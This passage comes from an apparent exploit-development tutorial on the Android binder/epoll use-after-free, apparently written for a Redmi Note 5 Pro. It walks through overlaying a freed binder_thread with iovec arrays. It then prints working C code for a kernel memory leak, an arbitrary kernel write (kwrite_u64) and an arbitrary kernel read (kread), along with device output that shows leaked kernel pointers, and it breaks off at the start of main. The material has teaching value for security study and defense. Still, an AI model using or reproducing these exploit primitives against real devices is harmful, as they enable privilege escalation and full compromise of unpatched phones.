| +0x188 |                       | `kiovecs[24].iov_len`    |
| +0x190 | `struct task_struct *task` | (not covered by the 25 `iovec`s) |

*After the epoll initialization. `kiovecs` stands for the kernel copies of our `iovec`s: the middle column is the freed, overwritten `binder_thread`, the right column the `kiovecs` array reallocated on top of it.*
As you can see, with an array of 25 iovec structures, we cover 400 out of 408 original bytes of the binder_thread.
This is close enough for the kernel to allocate them in the same spot.
Here is a reminder of the UAF we observed above:
the value thread + 0xa8 is written twice into the freed memory: at thread + 0xa8 and at thread + 0xb0
And that is what should happen when we trigger the UAF:
| offset | `binder_thread` field | overlaid `kiovecs` field | value |
|--------|-----------------------|--------------------------|-------|
| +0x000 | `struct binder_proc *proc` | `kiovecs[0].iov_base` | |
| +0x008 | `struct rb_node` (first `uint64_t`) | `kiovecs[0].iov_len` | |
| ···    | ···                   | ···                      |       |
| +0x0a0 | `thread->wait.lock`   | `kiovecs[10].iov_base`   |       |
| +0x0a8 | `thread->wait.task_list.next` | `kiovecs[10].iov_len` | `kiovecs + 0xa8` |
| +0x0b0 | `thread->wait.task_list.prev` | `kiovecs[11].iov_base` | `kiovecs + 0xa8` |
| +0x0b8 |                       | `kiovecs[11].iov_len`    |       |
| ···    | ···                   | ···                      |       |
| +0x188 |                       | `kiovecs[24].iov_len`    |       |
| +0x190 | `struct task_struct *task` |                     |       |

*The expected effect of the UAF*
This means that thanks to the UAF messing with the iovecs data, it looks like we can make the kernel think that thread + 0xa8 is a buffer address it needs to read from. That would then send kernel data to user space.
There are still three things to take care of:
  1. How to have a correct value for the spinlock at thread + 0xa0?
The spinlock value seen by spin_lock_irqsave is what has been overwritten by kiovecs[10].iov_base.
We also said that the spinlock needs to be 0 for it not to deadlock.
Fortunately there's a trick: the spinlock takes 8 bytes in struct binder_thread but actually uses only 4; the rest is alignment padding.
This means that any value of kiovecs[10].iov_base that has its 4 lowest bytes set to 0 allows the spinlock to be acquired.
And this is easy to ensure, like in the Project Zero PoC:
project_zero_poc.c
```c
dummy_page_4g_aligned = mmap((void*)0x100000000UL, 0x2000, PROT_READ|PROT_WRITE,
                             MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
```
  2. How to trigger the UAF without exiting the program?
In the Syzbot bug it was the exiting of the program that called ep_eventpoll_release and ultimately caused the UAF.
You don't need to exit to reach this code path though: removing the binder file descriptor from the epoll set with epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event) calls ep_remove, which then calls ep_unregister_pollwait, and from there you can recognize the path we saw earlier.
linux/fs/eventpoll.c
```c
SYSCALL_DEFINE4(epoll_ctl, int, epfd, int, op, int, fd,
		struct epoll_event __user *, event)
{
	//...
	case EPOLL_CTL_DEL:
		if (epi)
			error = ep_remove(ep, epi);
		else
			error = -ENOENT;
		break;
	//...
}
```
linux/fs/eventpoll.c
```c
/*
 * Removes a "struct epitem" from the eventpoll RB tree and deallocates
 * all the associated resources. Must be called with "mtx" held.
 */
static int ep_remove(struct eventpoll *ep, struct epitem *epi)
{
	// ...
	ep_unregister_pollwait(ep, epi);
	// ...
	return 0;
}
```
  3. How would the timing work?
    The reading will be done by vectored I/O, reading a pipe.
    Consider this:
modified_project_zero_poc.c
```c
// creating the pipe
int pipefd[2];

struct iovec iovecs[25];
memset(iovecs, 0, sizeof(iovecs));

iovecs[10].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */
iovecs[10].iov_len  = 0x1000;                /* wq->task_list->next */
iovecs[11].iov_base = (void *)0xDEADBEEF;    /* wq->task_list->prev */
iovecs[11].iov_len  = 0x1000;
```
If we set the iovecs up and read all the content at once we would get 0x1000 bytes from dummy_page_4g_aligned and 0x1000 bytes from 0xDEADBEEF.
Instead, we will use a property of pipe I/O: calls block when the buffer on the other end is full (or empty, depending on the direction).
So with the iovecs above, if we write them to the pipe with writev(pipefd[1], iovecs, 25) and a pipe buffer of 0x1000 bytes, then two read calls will have to be done:
  • read(pipefd[0], buffer, 0x1000) -> dummy_page_4g_aligned to dummy_page_4g_aligned + 0x1000
  • read(pipefd[0], buffer, 0x1000) -> 0xDEADBEEF to 0xDEADBEEF + 0x1000
Meanwhile, the writev call is blocked until everything has been sent to the pipe buffer, i.e. it can only return once the first read call has drained it.
That immediately hints at using another process, and this is actually something that is absolutely needed.
Indeed, writev is the call that makes the kernel copy the iovecs into kiovecs, after having verified that every iovecs[x].iov_base lies in user space.
That implies that the UAF (i.e. the rewriting of kiovecs[11].iov_base) must occur after the writev call, but as writev is blocking, you can't do it in the same process.
The second process will first have to trigger the UAF with the EPOLL_CTL_DEL call (thus overwriting kiovecs[11].iov_base with thread + 0xa8) and then read 0x1000 bytes from the buffer.
This makes the kernel load 0x1000 more bytes (the last ones, read from kiovecs[11].iov_base) of the kiovecs content into the buffer, thus releasing the writev call of the first process.
The final process is this:
  • Parent: writev(pipefd[1], iovecs, 25) -> load the iovecs into kernel memory, verify the addresses and load the first 0x1000 bytes into the buffer, i.e. everything from kiovecs[0] up to and including kiovecs[10]
  • Parent process is blocked as the buffer is full
  • Child: epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event) which triggers the UAF: kiovecs[10].iov_len (already consumed) and kiovecs[11].iov_base now equal thread + 0xa8
  • Child: read(pipefd[0], buffer, 0x1000) which reads the buffer, i.e. the first 0x1000 bytes: dummy_page_4g_aligned to dummy_page_4g_aligned + 0x1000
  • The kernel loads the next 0x1000 bytes into the buffer starting at kiovecs[11].iov_base = thread + 0xa8 and thus makes the writev call terminate
  • Parent continues after the writev return
  • Parent: read(pipefd[0], buffer, 0x1000) -> read the buffer, i.e. the next 0x1000 bytes: from thread + 0xa8 to thread + 0xa8 + 0x1000
Let's try to turn that into short, simple code:
exploit.c
```c
// a bunch of #include's

#define BINDER_THREAD_EXIT 0x40046208

void hexdump_memory(unsigned char *buf, size_t byte_count){/* ... */}

int main(){
    struct epoll_event event = {
        // .events = EPOLLRDHUP | EPOLLHUP | EPOLLERR | EPOLLIN,
        .events = EPOLLIN,
        .data.ptr = NULL
    };
    // void* dummy = mmap((void*)0x1000000, 0x1000, PROT_WRITE|PROT_EXEC,
    //                    MAP_SHARED|MAP_ANONYMOUS, -1, 0);
    // 4GiB-aligned memory; 0x1000 bytes would be enough
    void *dummy = mmap((void*)0x100000000UL, 0x2000, PROT_READ|PROT_WRITE,
                       MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
    int binder_fd = open("/dev/binder", O_RDONLY);
    int epfd = epoll_create(0x1000); // useless parameter, see `man epoll_create`
    epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event);

    // let's write to dummy to recognize it
    memcpy((char *)dummy + 11, "hello whyred!\x01\x02\x03", 16);

    // creation of the pipe
    int pipefd[2];
    pipe(pipefd);

    // creation of the buffer
    char buffer[0x1000];

    // set the pipe buffer size to 0x1000
    fcntl(pipefd[0], F_SETPIPE_SZ, 0x1000);

    // allocation of the `iovec`s
    struct iovec iovecs[25];
    memset(iovecs, 0, sizeof(iovecs));

    // create a pattern `iobXX` in the `iov_base`s to recognize where we are in the `iovec` array
    for(int i = 0; i < 25; i++){
        iovecs[i].iov_base = (void *)(0x3030626f69 + (((uint64_t)i/10)<<24) + (((uint64_t)i%10)<<32));
        iovecs[i].iov_len = 0;
    }

    // set the exploit values
    iovecs[10].iov_base = dummy;              /* spinlock in the low address half must be zero */
    iovecs[10].iov_len  = 0x1000;             /* wq->task_list->next */
    iovecs[11].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
    iovecs[11].iov_len  = 0x1000;

    // creation of the child process
    pid_t fork_ret = fork();
    if (fork_ret == 0){
        // this is the child process
        prctl(PR_SET_PDEATHSIG, SIGKILL);
        // wait a bit to be sure the parent is blocked in the `writev` call
        printf("Child spawned: waiting 1 second\n");
        sleep(1);
        // trigger the UAF and overwrite `kiovecs[11].iov_base` with `thread + 0xa8`
        printf("Child triggering UAF\n");
        epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event);
        // first read: should receive 0x1000 bytes of dummy
        printf("Child reading buffer from pipe\n");
        int received = read(pipefd[0], buffer, 0x1000);
        printf("The child process read 0x%x bytes, printing the first 0x100:\n", received);
        hexdump_memory(buffer, 0x100);
        // kill the child process
        exit(0);
    }

    // the parent process continues here
    // free the binder_thread: its memory will be reclaimed by the kiovecs
    ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
    printf("Parent about to be blocked\n");
    // load the `iovec`s into the kernel, verify the addresses and write until the buffer is full
    int written = writev(pipefd[1], iovecs, 25);
    // sleep a bit not to mix the stdout outputs
    sleep(1);
    printf("The parent process just finished writing 0x%x bytes.\n", written);
    // read 0x1000 bytes of buffer: should receive data starting at address `thread + 0xa8`
    printf("Parent reading buffer from pipe\n");
    int received = read(pipefd[0], buffer, 0x1000);
    printf("The parent process read 0x%x bytes, printing the first 0x100:\n", received);
    hexdump_memory(buffer, 0x100);
    return 0;
}
```
And here is the output:
```
whyred:/ $ /data/local/tmp/exploit
Parent about to be blocked
Child spawned: waiting 1 second
Child triggering UAF
Child reading buffer from pipe
The child process read 0x1000 bytes, printing the first 0x100:
00000000  00 00 00 00 00 00 00 00  00 00 00 68 65 6c 6c 6f  |........ ...hello|
00000010  20 77 68 79 72 65 64 21  01 02 03 00 00 00 00 00  | whyred! ........|
00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
00000030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
00000060  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
00000090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
000000a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
000000b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
000000c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
000000d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
000000e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
000000f0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
The parent process just finished writing 0x2000 bytes.
Parent reading buffer from pipe
The parent process read 0x1000 bytes, printing the first 0x100:
00000000  a8 ca ed 64 ee ff ff ff  a8 ca ed 64 ee ff ff ff  |...d.... ...d....|
00000010  00 10 00 00 00 00 00 00  69 6f 62 31 32 00 00 00  |........ iob12...|
00000020  00 00 00 00 00 00 00 00  69 6f 62 31 33 00 00 00  |........ iob13...|
00000030  00 00 00 00 00 00 00 00  69 6f 62 31 34 00 00 00  |........ iob14...|
00000040  00 00 00 00 00 00 00 00  69 6f 62 31 35 00 00 00  |........ iob15...|
00000050  00 00 00 00 00 00 00 00  69 6f 62 31 36 00 00 00  |........ iob16...|
00000060  00 00 00 00 00 00 00 00  69 6f 62 31 37 00 00 00  |........ iob17...|
00000070  00 00 00 00 00 00 00 00  69 6f 62 31 38 00 00 00  |........ iob18...|
00000080  00 00 00 00 00 00 00 00  69 6f 62 31 39 00 00 00  |........ iob19...|
00000090  00 00 00 00 00 00 00 00  69 6f 62 32 30 00 00 00  |........ iob20...|
000000a0  00 00 00 00 00 00 00 00  69 6f 62 32 31 00 00 00  |........ iob21...|
000000b0  00 00 00 00 00 00 00 00  69 6f 62 32 32 00 00 00  |........ iob22...|
000000c0  00 00 00 00 00 00 00 00  69 6f 62 32 33 00 00 00  |........ iob23...|
000000d0  00 00 00 00 00 00 00 00  69 6f 62 32 34 00 00 00  |........ iob24...|
000000e0  00 00 00 00 00 00 00 00  80 28 14 87 ee ff ff ff  |........ .(......|
000000f0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |........ ........|
whyred:/ $ 
```
There is a lot of good news here:
  • the timings look correct
  • the first RAM dump is dummy, you can recognize the message I put there
  • in the second RAM dump you can recognize the messages I put in the iov_bases: we are receiving kiovec data!
    We even know where we are, as the UAF writes thread + 0xa8 at address thread + 0xa8, which is exactly where the received bytes start
    -> thread + 0xa8 = 0xffffffee64edcaa8
    -> thread = 0xffffffee64edca00
In short, we just read kernel data as an unprivileged user.
This is promising.

Leak something useful (task_struct)

Thanks to the content of binder_thread, leaking a useful value is straightforward.
The last thing it contains is struct task_struct *task.
This task_struct actually contains a lot of information about the current thread (the program, not the binder_thread).
That will be used later.
binder_thread starts leaking at thread + 0xa8, so everything after this address is available to us; task has an offset of 0x190 (cf. the binder_thread definition), so *(uint64_t*)(buffer - 0xa8 + 0x190) = *(uint64_t*)(buffer + 0xe8) = thread->task.
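As a small helper sketch (reusing the `buffer` from the leak above; the arithmetic is the one we just did), this is how the pointer can be extracted:

```c
#include <stdint.h>

// The leak starts at thread + 0xa8 and `task` lives at thread + 0x190,
// so the pointer sits 0x190 - 0xa8 = 0xe8 bytes into the leaked buffer.
static uint64_t leaked_task_struct(const unsigned char *buffer)
{
	return *(const uint64_t *)(buffer + 0x190 - 0xa8);
}
```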

Perform an arbitrary kernel write

The kernel has leaked a kernel value into user space, but it's not practical yet: we can read from only one address, and we can't write at all.
We will start with arbitrary write.
Fortunately the exploit is close to the previous one and uses the same tricks.
When leaking data, we are reading data from the kernel. On the other hand, writing to kernel space would require us to send the kernel both the address we want to write to and the source data.
The problem to solve is: how to send data to the kernel.
I hope you guessed it: using vectored I/O.
To send the data to the kernel we need to write to kernel memory, so this time we will use the iovec buffers as the receiving side of the pipe.
The data sent through the pipe will be dispatched successively into each buffer, according to its iov_len.
Once again, as we want to write to kernel memory, we will have to:
  • make the kernel validate the iov_bases
  • then block the readv because of an empty buffer: if there's nothing to read from the pipe, then the process is blocked because there's nothing to write to the memory through the vectored I/O
  • create a child to trigger the UAF, that puts a kernel pointer in one of the iov_bases
  • the data sent through the pipe overwrites the kernel memory
The UAF only lets us overwrite with the value thread + 0xa8 (at thread + 0xa8 = &kiovecs[10].iov_len and at thread + 0xb0 = &kiovecs[11].iov_base), so this is what we have to work with.
Like in the previous chapter the blocking iovec will be iovecs[10].
Here are the steps of this exploit:
  • iovecs[10] is blocked by the empty pipe and setting iovecs[10].iov_len = 1 is enough to block the process until the first byte is received (1)
  • in child process, trigger the UAF, thus writing thread + 0xa8 in kiovecs[11].iov_base (2)
  • we make kiovecs[11] write 5*8 piped bytes (3*8 unused bytes + kiovecs[12]) to overwrite the memory data from thread + 0xa8 (the only address overwritten by the UAF) to thread + 0xc8 = &kiovecs[12].iov_len, which allows us to completely control kiovecs[12] (3)
  • finally our completely controlled kiovecs[12] writes the remaining bytes sent through the pipe at the address we chose
| offset | `binder_thread` field | overlaid `kiovecs` field | value |
|--------|-----------------------|--------------------------|-------|
| +0x000 | `struct binder_proc *proc` | `kiovecs[0].iov_base` | |
| +0x008 | `struct rb_node` (first `uint64_t`) | `kiovecs[0].iov_len` | |
| ···    | ···                   | ···                      |       |
| +0x0a0 | `thread->wait.lock`   | `kiovecs[10].iov_base`   | `dummy` |
| +0x0a8 | `thread->wait.task_list.next` | `kiovecs[10].iov_len` | |
| +0x0b0 | `thread->wait.task_list.prev` | `kiovecs[11].iov_base` | |
| +0x0b8 |                       | `kiovecs[11].iov_len`    | `5 * 8` |
| +0x0c0 |                       | `kiovecs[12].iov_base`   |       |
| +0x0c8 |                       | `kiovecs[12].iov_len`    |       |
| ···    | ···                   | ···                      |       |
| +0x188 |                       | `kiovecs[24].iov_len`    |       |
| +0x190 | `struct task_struct *task` |                     |       |

*(1) Initial kiovecs*
| offset | `binder_thread` field | overlaid `kiovecs` field | value |
|--------|-----------------------|--------------------------|-------|
| +0x000 | `struct binder_proc *proc` | `kiovecs[0].iov_base` | |
| +0x008 | `struct rb_node` (first `uint64_t`) | `kiovecs[0].iov_len` | |
| ···    | ···                   | ···                      |       |
| +0x0a0 | `thread->wait.lock`   | `kiovecs[10].iov_base`   | `dummy` |
| +0x0a8 | `thread->wait.task_list.next` | `kiovecs[10].iov_len` | `thread + 0xa8` |
| +0x0b0 | `thread->wait.task_list.prev` | `kiovecs[11].iov_base` | `thread + 0xa8` |
| +0x0b8 |                       | `kiovecs[11].iov_len`    | `5 * 8` |
| +0x0c0 |                       | `kiovecs[12].iov_base`   |       |
| +0x0c8 |                       | `kiovecs[12].iov_len`    |       |
| ···    | ···                   | ···                      |       |
| +0x188 |                       | `kiovecs[24].iov_len`    |       |
| +0x190 | `struct task_struct *task` |                     |       |

*(2) Memory after the UAF*
| offset | `binder_thread` field | overlaid `kiovecs` field | value |
|--------|-----------------------|--------------------------|-------|
| +0x000 | `struct binder_proc *proc` | `kiovecs[0].iov_base` | |
| +0x008 | `struct rb_node` (first `uint64_t`) | `kiovecs[0].iov_len` | |
| ···    | ···                   | ···                      |       |
| +0x0a0 | `thread->wait.lock`   | `kiovecs[10].iov_base`   |       |
| +0x0a8 | `thread->wait.task_list.next` | `kiovecs[10].iov_len` | whatever (was `thread + 0xa8`) |
| +0x0b0 | `thread->wait.task_list.prev` | `kiovecs[11].iov_base` | whatever (was `thread + 0xa8`) |
| +0x0b8 |                       | `kiovecs[11].iov_len`    | whatever |
| +0x0c0 |                       | `kiovecs[12].iov_base`   | `target_addr` |
| +0x0c8 |                       | `kiovecs[12].iov_len`    | `target_size` |
| ···    | ···                   | ···                      |       |
| +0x188 |                       | `kiovecs[24].iov_len`    |       |
| +0x190 | `struct task_struct *task` |                     |       |

*(3) Memory after the kiovecs[11]-based kernel write has been performed. The next bytes pushed through the pipe will make the kernel use kiovecs[12], i.e. write them to target_addr.*
And this is how the arbitrary write is done.
Sadly, we can't see the result because we can only write, not read, kernel data.
I can confirm it works though, and you will be able to confirm it too in the next chapter.
To keep things practical, let's put this in a function: int kwrite_u64(uint64_t addr, uint64_t value).
exploit.c
```c
int kwrite_u64(uint64_t target_addr, uint64_t target_value){
    struct epoll_event event = {
        .events = EPOLLIN,
        .data.ptr = NULL
    };
    epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event);

    // creation of the "pipe": recvmsg needs a socket, hence socketpair
    int pipefd[2];
    // pipe(pipefd);
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, pipefd))
        errx(1, "socketpair");
    // one byte so that kiovecs[10] (iov_len = 1) can be consumed immediately
    write(pipefd[1], "X", 1);

    // creation of the buffer
    char buffer[0x1000];

    // allocation of the `iovec`s
    struct iovec iovecs[25];
    memset(iovecs, 0, sizeof(iovecs));

    // actual write parameters
    uint64_t write_data_chunk[] = {1, 0xDEADBEEF, 5*8, target_addr, 8};

    // set the exploit values
    iovecs[10].iov_base = dummy;
    iovecs[10].iov_len  = 1;                  // will be replaced by the UAF
    iovecs[11].iov_base = (void *)0xDEADBEEF; // will be replaced by the UAF
    iovecs[11].iov_len  = 5*8;
    iovecs[12].iov_base = (void *)0xDEADBEEF; // will be replaced by the `kiovecs[11]`-based rewrite
    iovecs[12].iov_len  = 8;                  // will be replaced by the `kiovecs[11]`-based rewrite

    // creation of the child process
    pid_t fork_ret = fork();
    if (fork_ret == 0){
        // this is the child process
        prctl(PR_SET_PDEATHSIG, SIGKILL);
        // wait a bit to be sure the parent is blocked in the `recvmsg` call
        SLEEP();
        // trigger the UAF and overwrite `kiovecs[11].iov_base` with `thread + 0xa8`
        epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event);
        // these 5*8 bytes land at thread + 0xa8 through kiovecs[11]
        // and rewrite everything from kiovecs[10].iov_len to kiovecs[12].iov_len
        write(pipefd[1], write_data_chunk, 5*8);
        // the remaining 8 bytes land at target_addr through kiovecs[12]
        write(pipefd[1], &target_value, 8);
        // kill the child process
        exit(0);
    }

    // the parent process continues here
    // free the binder_thread: its memory will be reclaimed by the kiovecs
    ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
    struct msghdr msg = {
        .msg_iov = iovecs,
        .msg_iovlen = 25
    };
    // load the `iovec`s into the kernel, verify the addresses and read bytes
    // until it has received all the bytes of `msg`
    int recvmsg_result = recvmsg(pipefd[0], &msg, MSG_WAITALL);
    // sleep a bit not to mix the stdout outputs
    SLEEP();
    // printf("The parent process received 0x%x bytes\n", recvmsg_result);

    int status;
    if (wait(&status) != fork_ret)
        errx(1, "wait");
    return 0;
}
```

Perform an arbitrary kernel read without overwriting addr_limit

When you have arbitrary kernel write, you usually overwrite the addr_limit of your current process (if you manage to find its address) in order to achieve instant arbitrary kernel read over the whole RAM.
This doesn't work on the Redmi Note 5 Pro though, so I won't discuss it more.
This is, as far as I know, the first time this specific arbitrary kernel read method is explained; you won't find explanations elsewhere.
So if my method is badly executed or if you know another place where this is discussed or even if you have suggestions for improvement, then please contact me (comment section below, Github, mail or whatever) so that I can fix and/or compare the methods.
As seen above, writev, readv and recvmsg are one-way only: writev sends to the file descriptor what it reads from the buffers, while the other two read data from the file descriptor and write it to the buffers. The read operation we are trying to build is more complicated because it needs to do both: it must send the target address to the kernel and then receive the corresponding data back.
The problem is that in order to write in kernel memory, you need to know the address you want to write to, so you need to have received it from the kernel itself as it's a kernel address.
In short, in order to write you need to read (to know where you, the exploiter, want to write) and in order to read you need to write (for the kernel to know where it must read from): it's a vicious circle.
Except for one thing: there is one kernel address that we can spontaneously receive: thread + 0xa8, leaked through kiovecs[11].iov_base.
Thanks to this leaked pointer we can sort everything out.
Notice we want to read data from kernel memory so we will use writev to make the kernel write from the kiovec buffers into the pipe and read to read from the pipe.
Let's write the whole process down:
  • first of all we leak thread + 0xa8 as before, but we also know that at some point the kernel will extract the data we want:
    • iovecs[10].iov_base is dummy
    • iovecs[10].iov_len is 0x1000
    • iovecs[11].iov_base is 0xdeadbeef
    • iovecs[11].iov_len is 0x1000
    • iovecs[n].iov_base is 0xbeefdead, as the address that will be overwritten by target_addr for extraction (n unknown for now)
    • iovecs[n].iov_len is 0x1000, as an example
  • Parent: creates child process that will sleep for 2 seconds, triggers the UAF and reads 0x1000 bytes into buffer
  • Child: created, waits 2 seconds...
  • Parent: writev to load the iovecs into kiovecs, process is blocked (1)
  • Child: ...triggers the UAF, loads 0x1000 bytes (kiovecs[10].iov_base = dummy) into buffer (2)
  • Kernel: 0x1000 bytes were read from the pipe so kernel loads 0x1000 new bytes (i.e. kiovecs[11]) into the pipe
  • Child: loads again 0x1000 bytes (kiovecs[11] = thread + 0xa8) into buffer
  • Kernel: 0x1000 bytes were read from the pipe so loads 0x1000 new bytes (i.e. kiovecs[12] if we set kiovecs[12].iov_len = 0x1000) into the pipe
  • Child: we know that *(thread + 0xa8) = thread + 0xa8, so if we dereference the first 8 bytes of buffer we get thread + 0xa8 in user space: leak = *(void**)buffer = thread + 0xa8
  • Child: we overwrite iovecs[n].iov_base with target_addr using kwrite_u64(&kiovecs[n].iov_base, target_addr) in a grandchild process, but as we don't know kiovecs, we use leak as base address: kwrite_u64(leak + 8 + 16*(n-11), target_addr) (write it down if necessary) (3)
  • Child: loads again 0x1000 bytes (kiovecs[12]) into buffer
  • Kernel: 0x1000 bytes were read from the pipe so loads 0x1000 new bytes (i.e. kiovecs[13]) into the pipe
  • Comment: with n = 13 we have our data waiting for us in the pipe so let's assume this value
  • Kernel: nothing more to load, writev call is finished
  • Child: terminates
  • Parent: loads 0x1000 bytes (kiovecs[13]) into buffer
  • Parent: the content of buffer is the 0x1000 first bytes at kiovecs[13].iov_base = target_addr
  • Arbitrary read achieved
| offset | `binder_thread` field | overlaid `kiovecs` field | value |
|--------|-----------------------|--------------------------|-------|
| +0x000 | `struct binder_proc *proc` | `kiovecs[0].iov_base` | |
| +0x008 | `struct rb_node` (first `uint64_t`) | `kiovecs[0].iov_len` | |
| ···    | ···                   | ···                      |       |
| +0x0a0 | `thread->wait.lock`   | `kiovecs[10].iov_base`   | `dummy` |
| +0x0a8 | `thread->wait.task_list.next` | `kiovecs[10].iov_len` | `0x1000` |
| +0x0b0 | `thread->wait.task_list.prev` | `kiovecs[11].iov_base` | `0xdeadbeef` |
| +0x0b8 |                       | `kiovecs[11].iov_len`    | `0x1000` |
| +0x0c0 |                       | `kiovecs[12].iov_base`   | `dummy` |
| +0x0c8 |                       | `kiovecs[12].iov_len`    | `0x1000` |
| +0x0d0 |                       | `kiovecs[13].iov_base`   | `0xbeefdead` |
| +0x0d8 |                       | `kiovecs[13].iov_len`    | `0x1000` |
| ···    | ···                   | ···                      |       |
| +0x188 |                       | `kiovecs[24].iov_len`    |       |
| +0x190 | `struct task_struct *task` |                     |       |

*(1) Initial kiovecs*
| offset | `binder_thread` field | overlaid `kiovecs` field | value |
|--------|-----------------------|--------------------------|-------|
| +0x000 | `struct binder_proc *proc` | `kiovecs[0].iov_base` | |
| +0x008 | `struct rb_node` (first `uint64_t`) | `kiovecs[0].iov_len` | |
| ···    | ···                   | ···                      |       |
| +0x0a0 | `thread->wait.lock`   | `kiovecs[10].iov_base`   |       |
| +0x0a8 | `thread->wait.task_list.next` | `kiovecs[10].iov_len` | `thread + 0xa8` |
| +0x0b0 | `thread->wait.task_list.prev` | `kiovecs[11].iov_base` | `thread + 0xa8` |
| +0x0b8 |                       | `kiovecs[11].iov_len`    |       |
| +0x0c0 |                       | `kiovecs[12].iov_base`   |       |
| +0x0c8 |                       | `kiovecs[12].iov_len`    |       |
| +0x0d0 |                       | `kiovecs[13].iov_base`   |       |
| +0x0d8 |                       | `kiovecs[13].iov_len`    |       |
| ···    | ···                   | ···                      |       |
| +0x188 |                       | `kiovecs[24].iov_len`    |       |
| +0x190 | `struct task_struct *task` |                     |       |

*(2) After the UAF*
| offset | `binder_thread` field | overlaid `kiovecs` field | value |
|--------|-----------------------|--------------------------|-------|
| +0x000 | `struct binder_proc *proc` | `kiovecs[0].iov_base` | |
| +0x008 | `struct rb_node` (first `uint64_t`) | `kiovecs[0].iov_len` | |
| ···    | ···                   | ···                      |       |
| +0x0a0 | `thread->wait.lock`   | `kiovecs[10].iov_base`   |       |
| +0x0a8 | `thread->wait.task_list.next` | `kiovecs[10].iov_len` | `thread + 0xa8` |
| +0x0b0 | `thread->wait.task_list.prev` | `kiovecs[11].iov_base` | `thread + 0xa8` |
| +0x0b8 |                       | `kiovecs[11].iov_len`    |       |
| +0x0c0 |                       | `kiovecs[12].iov_base`   |       |
| +0x0c8 |                       | `kiovecs[12].iov_len`    |       |
| +0x0d0 |                       | `kiovecs[13].iov_base`   | `target_addr` |
| +0x0d8 |                       | `kiovecs[13].iov_len`    |       |
| ···    | ···                   | ···                      |       |
| +0x188 |                       | `kiovecs[24].iov_len`    |       |
| +0x190 | `struct task_struct *task` |                     |       |

*(3) After the kwrite_u64 call*
exploit.c
```c
uint64_t kread_u64(uint64_t addr){
    uint64_t r;
    kread(addr, &r, 8);
    return r;
}

int kread(uint64_t addr, void *buf, int size){
    struct epoll_event event = {
        .events = EPOLLIN,
        .data.ptr = NULL
    };
    epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event);

    // creation of the pipe
    int pipefd[2];
    pipe(pipefd);

    // creation of the buffer
    char buffer[0x1000];

    // set the pipe buffer to 0x1000
    fcntl(pipefd[0], F_SETPIPE_SZ, 0x1000);

    // allocation of the `iovec`s
    struct iovec iovecs[25];
    memset(iovecs, 0, sizeof(iovecs));

    // set the exploit values
    iovecs[10].iov_base = dummy;              /* spinlock in the low address half must be zero */
    iovecs[10].iov_len  = 0x1000;             /* wq->task_list->next */
    iovecs[11].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
    iovecs[11].iov_len  = 0x1000;
    iovecs[12].iov_base = dummy;
    iovecs[12].iov_len  = 0x1000;
    iovecs[13].iov_base = (void *)0xDEADBEEF; // will be rewritten with the target address
    iovecs[13].iov_len  = 0x1000;

    // creation of the child process
    pid_t fork_ret = fork();
    if (fork_ret == 0){
        // this is the child process
        prctl(PR_SET_PDEATHSIG, SIGKILL);
        // wait a bit to be sure the parent is blocked in the `writev` call
        SLEEP();
        // trigger the UAF and overwrite `kiovecs[11].iov_base` with `thread + 0xa8`
        epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event);
        // first 0x1000 bytes: dummy (kiovecs[10])
        read(pipefd[0], buffer, 0x1000);
        // next 0x1000 bytes: the leak (kiovecs[11], read from thread + 0xa8)
        read(pipefd[0], buffer, 0x1000);
        unsigned long thread = (*(unsigned long *)buffer) - 0xa8;
        pid_t grandchild = fork();
        if (grandchild == -1)
            errx(1, "fork");
        if (grandchild == 0){
            prctl(PR_SET_PDEATHSIG, SIGKILL);
            // thread + 0xd0 = &kiovecs[13].iov_base
            kwrite_u64(thread + 0xd0, addr);
            exit(0);
        }
        int status;
        if (wait(&status) != grandchild)
            errx(1, "wait");
        // third 0x1000 bytes: dummy again (kiovecs[12]); this makes the kernel
        // load kiovecs[13], i.e. 0x1000 bytes read from `addr`, into the pipe
        read(pipefd[0], buffer, 0x1000);
        close(pipefd[1]);
        // kill the child process
        exit(0);
    }

    int received;
    // the parent process continues here
    // free the binder_thread: its memory will be reclaimed by the kiovecs
    ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
    // load the `iovec`s into the kernel, verify the addresses and write until the buffer is full
    int written = writev(pipefd[1], iovecs, 25);
    // sleep a bit not to mix the stdout outputs
    SLEEP();
    // read the buffer: the 0x1000 bytes starting at `addr`
    received = read(pipefd[0], buffer, 0x1000);
    memcpy(buf, buffer, size);
    // hexdump_memory(buffer, size*8);
    int status;
    if (wait(&status) != fork_ret)
        errx(1, "wait");
    return 0;
}

int main(int argc, char** argv){
